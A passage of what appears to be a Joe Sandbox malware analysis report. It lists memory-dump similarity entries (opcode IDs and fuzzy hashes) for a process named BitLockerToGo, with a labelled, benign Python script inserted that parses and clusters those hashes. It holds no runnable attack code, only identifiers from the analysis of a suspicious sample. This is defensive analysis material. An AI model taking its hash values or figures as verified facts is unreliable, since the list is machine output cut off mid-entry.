                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 'C
                                                                                                                                                                                                            • API String ID: 0-1959375024
                                                                                                                                                                                                            • Opcode ID: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
                                                                                                                                                                                                            • Instruction ID: 6a2eb9f9bc051ac7585a28991c81e0efb8283155a37514e0de2331f159ba5eab
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15b3dceed2422b8a86bb36206473813b246add45689b2aad14f1ff44a5455306
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6401283070C3618FC715CF69E5C0227BBE2EBD6300F1891AAD8D49B216C679C90A879F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: X|T
                                                                                                                                                                                                            • API String ID: 0-2625694639
                                                                                                                                                                                                            • Opcode ID: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
                                                                                                                                                                                                            • Instruction ID: d1cbbd9272d1375db2703005e1fbf4b2755e8cb02be92dc54b6a5afa885c6bec
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f300bed5bc34852233b1656f5377e06bb0b50d32563c744d353c8ad641e09496
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01014477E997A48FD3485F749CC607BB2E0EB47705F0A183DEDC9AB280C5659D00D648
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
                                                                                                                                                                                                            • Instruction ID: 40a78145a15ed7abd580535788d63f0ce19baa41bfbb966a4b0a28bc3c900fb3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21f1b8bd8a719ddbe8c4ea0fcc52d12380974d4c75bee49ea26b480580b85d0b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33428C759183518BD724CF28C850BBBB7E2EB97304F1A887DD4C297292D738D941CB9A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0cd38c1f917d56529f2e9072a767a05c965a744410acbca6e37e46bfde3c2afc
                                                                                                                                                                                                            • Instruction ID: 0b7c30790ff7d95851666302495b6cb6b96fef3e5f93ae92670a14908cf15253
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd38c1f917d56529f2e9072a767a05c965a744410acbca6e37e46bfde3c2afc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC52C4B0908B848FE735CB24C4843A7BBE1AB91314F16893FC5D716BC2C37DA995971A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
                                                                                                                                                                                                            • Instruction ID: 5393f3433c53e1f8dfd6ebf06364cad0a5c17ff95c182cda39d20013721ad581
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cf5f40db601465183f1577b92b9d452b740621377bdeef01513126a201992b7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA52E4715083458FCB15CF14C0906AABFE1BF89305F188A7EF8996B381D779EA49CB85
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
                                                                                                                                                                                                            • Instruction ID: 4f29358fa94e60aeb1969c962f0f8eec6781083342835fdf5c39f23cee3708bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a92be46bfed57546a5f9e8b5510e386b31214c144960992f720f2d1649aaaf3f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E512213AB58351CFC704CF68E8D026AB7E2FB8A314F0A847DD58587361D7789855CB86
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
                                                                                                                                                                                                            • Instruction ID: b00a11197861395ebb150adc986e88646148ed7565683f65526ca2b7b29a586a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 37d0343cc3af12e6bb456e5885e59e5124fa04285dfd488beedb1d99f790847e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD128631A0C7118BD724DF58D8816ABB3E1FBC4305F29893ED986A7281D738B915CB87
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 33f6b6bf988d0bc28af98b4a3afc124b895597901a604a82cf678b12a907b646
                                                                                                                                                                                                            • Instruction ID: 8f5dcc2dcb728897a76ec87141d143f4f47f9916a17ff80561f346b336745cb7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33f6b6bf988d0bc28af98b4a3afc124b895597901a604a82cf678b12a907b646
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7322470914B118FC328CF29C68052ABBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
                                                                                                                                                                                                            • Instruction ID: 032fafdfe8fcb9316dd3be8f47d4dae1e8b19dbe72e2b5a4dcd20de423910f36
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e555c5e4e5eae30bd6c8f71e8691bc3b66b480363aebcdc22df0d600b96f390
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45523AB0518B819ED3358F3C8855796BFE5AB5A324F048B9DE0FA873D2C7756002CB66
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
                                                                                                                                                                                                            • Instruction ID: 7060ff257f1d57e8326384c3aaed6f283346be69202c19536aca7bdb8c3aaad4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d1a6229bbe16b85bfd67a1033bc9a6a0ebf70d07d3f0463925b7d3b15b6d579
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0815774E04224CBDF20CF54D8916AF73B1FF55310F18819DD8856B385E7389912CBA9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
                                                                                                                                                                                                            • Instruction ID: 1303130b957ef33d10d9c1787a5ad37353acd530864993bbcf8375f38532070f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8378e6bff936da297aba018c7d2d83918e4e0f8e838101816c59e98364e1476
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3812637749A800BD32CAD7D4C522A6B9835BDA330F3DD37EA5B18B3E5E9A848025345
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
                                                                                                                                                                                                            • Instruction ID: 0bfc5a374a60af3586e218f93e2c2928d82f03b66c5554fb0b2c1f037090387e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC911435A083019FE714CF18D891A2BB3E2EFD9710F19952DEA858B3A5DB35DC11CB4A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
                                                                                                                                                                                                            • Instruction ID: b66e43f3b97cf1dfe37cda8ef161d74f150199c18f2f0b2dd8126107ca88f700
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9ead859f0848f669d2e829078559d8ec03b56143b4f448b9ced0e895ec2f484
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C77134756482009BE7148F29DC8172F73A6EFC9304F19983EE68657296DB788C01DB5A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                                                            • Opcode ID: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
                                                                                                                                                                                                            • Instruction ID: b6c6c0bb9063e71726147574d8d4a9f3fa072b62720395db4690d828467e09fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3db7b38915ac6ba1d39507d845bd541b0533e411939310bf36cc07f58a00772
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B613432F442108BD7209F69D8C126BB7A2ABD9320F1E953ED8C4B7315D6799C5287C6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
                                                                                                                                                                                                            • Instruction ID: fd324c467d0d4d67cb19f0be7c245ecd171908bcd495dc43fa11a230d99e3a73
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc66f1a2bb9c2a7dccc74bf005c160ac6a51bbee258682b17d2ee790622564db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D61E7B5E01226CBCB148F54C861ABEB7B1FF56310F19829DD8466F391E7389841CB98
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
                                                                                                                                                                                                            • Instruction ID: 9cae756e44e46e412c6b7bae4618893f63236fa384344dc74c3a447ed554000f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4761597020C3A18BD3198B3694A077F7FD09F97314F684A9EE4D65B381D6388946C79A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
                                                                                                                                                                                                            • Instruction ID: 91ec8ecf55fe5685fb4db376a75285eb36e4341672459a1fb700e153c465ee75
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 25616B7020C3A18BD3198F3694E077F7FD09F97714F684A9EE4C65B282D6388546C79A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
                                                                                                                                                                                                            • Instruction ID: a090848f6cc525cad24b9e20c821547faca872518ba63d46f27936152a4cd5de
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73517C7020C3A14BD3198B3694E077F7FD09F97718F684A5EE4C65B281C6388546C79A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
                                                                                                                                                                                                            • Instruction ID: 5b2891c8fe877119163b7f98e476f77a68e93a46c016bb1ad212271ab8b7413a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e3528b0a3b5b2d1b0721c0715f93a3f1cc7ad484ab942ba11314165fb739265
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97717A37649AD04BE3285E7C4C713A6BA934F97630F2D936EE9F54B3E2C5684D028345
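Added example, not part of the Joe Sandbox report: a small Python script that parses the "Memory Dump Source" entries in this section into records, groups them by API ID, and clusters functions whose Instruction Fuzzy Hashes are near-identical. Three of the entries above (Opcode IDs 596c9a500c2b…, f4616abc86f5… and 74faaaf9cd24…) have instruction hashes that differ in only 11 to 14 of their 70 hex digits, which is the kind of group worth opening first in the disassembly. The sample input embeds four entries copied from this section; the Instruction ID lines and the Opcode Fuzzy Hash lines (the latter repeats the Opcode ID in every entry) are left out to keep the excerpt short, and the parser accepts them when present. Assumptions: the fuzzy hash is treated as an opaque fixed-width hex string compared position by position, because the report does not document how it is derived, and the cut-off of 20 differing positions is an arbitrary threshold chosen for this example.

```python
"""Parse the 'Memory Dump Source' similarity entries of a Joe Sandbox report,
group them by API ID and cluster near-identical Instruction Fuzzy Hashes."""
import re
from itertools import combinations

# Sample input: four entries copied from the report section above. Instruction ID
# and Opcode Fuzzy Hash lines are omitted; the parser accepts them when present.
REPORT_EXCERPT = """\
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 11d321e5ccd940af602ca8ba1001a7aaad8d8f990ec326c4c672754488b02dbe
• Instruction Fuzzy Hash: CC911435A083019FE714CF18D891A2BB3E2EFD9710F19952DEA858B3A5DB35DC11CB4A
Memory Dump Source
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
• API ID:
• Opcode ID: 596c9a500c2b211e0bede0dc7108b3830e98fe79128f0a5cf5a6a8000d0bd306
• Instruction Fuzzy Hash: 4761597020C3A18BD3198B3694A077F7FD09F97314F684A9EE4D65B381D6388946C79A
Memory Dump Source
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
• API ID:
• Opcode ID: f4616abc86f5eec50a33f05d8b81670d6b12a01ee44a15341e545930cacdef31
• Instruction Fuzzy Hash: 25616B7020C3A18BD3198F3694E077F7FD09F97714F684A9EE4C65B282D6388546C79A
Memory Dump Source
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
• API ID:
• Opcode ID: 74faaaf9cd24d676a092b8e6f9ac3efb77d7115b5d8593a4af48d1d83e65560f
• Instruction Fuzzy Hash: 73517C7020C3A14BD3198B3694E077F7FD09F97718F684A5EE4C65B281C6388546C79A
"""

# One '• Key: value' line; the value may itself contain ': ' (see Source File),
# so the key is everything up to the first colon.
FIELD_RE = re.compile(r"^[•*-]\s*([^:]+?)\s*:\s*(.*?)\s*$")


def parse_entries(text):
    """Return one dict per 'Memory Dump Source' block, keyed by field name."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            current = {}
            entries.append(current)
            continue
        match = FIELD_RE.match(line)
        if match and current is not None:
            current[match.group(1)] = match.group(2)
        # Section labels ('Joe Sandbox IDA Plugin', 'Similarity') carry no data.
    return entries


def nibble_distance(hash_a, hash_b):
    """Count hex-digit positions at which two fuzzy hashes differ.

    Assumption: the hash is an opaque fixed-width hex string compared position
    by position; the report does not document how Joe Sandbox derives it."""
    if len(hash_a) != len(hash_b):
        raise ValueError("fuzzy hashes of different width are not comparable")
    return sum(1 for a, b in zip(hash_a.upper(), hash_b.upper()) if a != b)


def cluster_by_instruction_hash(entries, max_distance):
    """Single-linkage clusters (sorted lists of Opcode IDs) of entries whose
    Instruction Fuzzy Hashes differ in at most max_distance positions."""
    parent = list(range(len(entries)))

    def find(i):  # union-find root lookup with path halving
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(entries)), 2):
        h_i = entries[i].get("Instruction Fuzzy Hash", "")
        h_j = entries[j].get("Instruction Fuzzy Hash", "")
        if h_i and h_j and len(h_i) == len(h_j) and nibble_distance(h_i, h_j) <= max_distance:
            parent[find(i)] = find(j)
    groups = {}
    for i, entry in enumerate(entries):
        groups.setdefault(find(i), []).append(entry.get("Opcode ID", "?"))
    return sorted(sorted(g) for g in groups.values())


def group_by_api(entries):
    """Map each API ID (empty string when the entry lists none) to its Opcode IDs."""
    by_api = {}
    for entry in entries:
        by_api.setdefault(entry.get("API ID", ""), []).append(entry.get("Opcode ID", "?"))
    return by_api


if __name__ == "__main__":
    parsed = parse_entries(REPORT_EXCERPT)
    for group in cluster_by_instruction_hash(parsed, max_distance=20):
        print(f"{len(group)} function(s):", [oid[:12] for oid in group])
    for api, oids in group_by_api(parsed).items():
        print(api or "(no API ID)", "->", [oid[:12] for oid in oids])
```

To run it over the whole report, paste the full similarity section into REPORT_EXCERPT or read it from a file; the parser ignores the section labels and tolerates entries that are missing fields, such as an entry cut off before its Instruction Fuzzy Hash.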
Memory Dump Source
• Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
• Instruction ID: 469687be043b2f9f4970facd4e4c08c479ec777d83b0675a84ba9d55084d64b3
• Opcode Fuzzy Hash: c24a52d2344ba59c91023f4ae5247fefca46f4485c28eac47c4d84031731ef7e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18711573A4D9904BD328893C4C123AA6E934BD3334F2DC3AEE5B6873E5D56D48428349
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
                                                                                                                                                                                                            • Instruction ID: a7f5e9c046c4957bb4a88c91f70171074d68fbe3518662ea52ef9577db1fb83e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f27cd28c20e0b718978d2eadf5d52200c50729cfa5ec1e475a15264fa4dfe5b0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA1A161608FC08BD3159A3898943E7BFE25FA6324F188A7DD4FE473C6D678A409C716
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: db39e290813564dad3724b79deb140b57ce3141e843a651e9f5f344617681626
                                                                                                                                                                                                            • Instruction ID: 10fdaf47f6b14bfbe331076cd5057ec1334350043aed3e0252b47af58e088c01
                                                                                                                                                                                                            • Opcode Fuzzy Hash: db39e290813564dad3724b79deb140b57ce3141e843a651e9f5f344617681626
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44613633B4AA804BD728CD3C5C513A67A930BD7330B2EC77EE6B58B3E5E56848524346
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: c1684320cec7a9cf7998564e3e50963ad1a149a90c03f316f8258aba6f7eab80
                                                                                                                                                                                                            • Instruction ID: 531981158a6f9b00caa3a14850ce91ceb08ed0e88ac49b002fa73ad3765a9f98
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1684320cec7a9cf7998564e3e50963ad1a149a90c03f316f8258aba6f7eab80
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56612733B149A14BC7288D3C4C112BEBA534B9A330F2E937BE975DB3E5C5684D014394
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
                                                                                                                                                                                                            • Instruction ID: d2a2c762938f2fca4047324f4a8cb11edca21d1421b4f064fd9b2157b6ab5b48
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a1a6866e3941fce45a46cc0b3d9800c7fca2611ad3657d096bf3e1dc041b0b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD515BB15087548FE324DF29D49475BBBE1BBC8318F044A2EE4E987351E779DA088F86
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000004.00000002.2858668939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
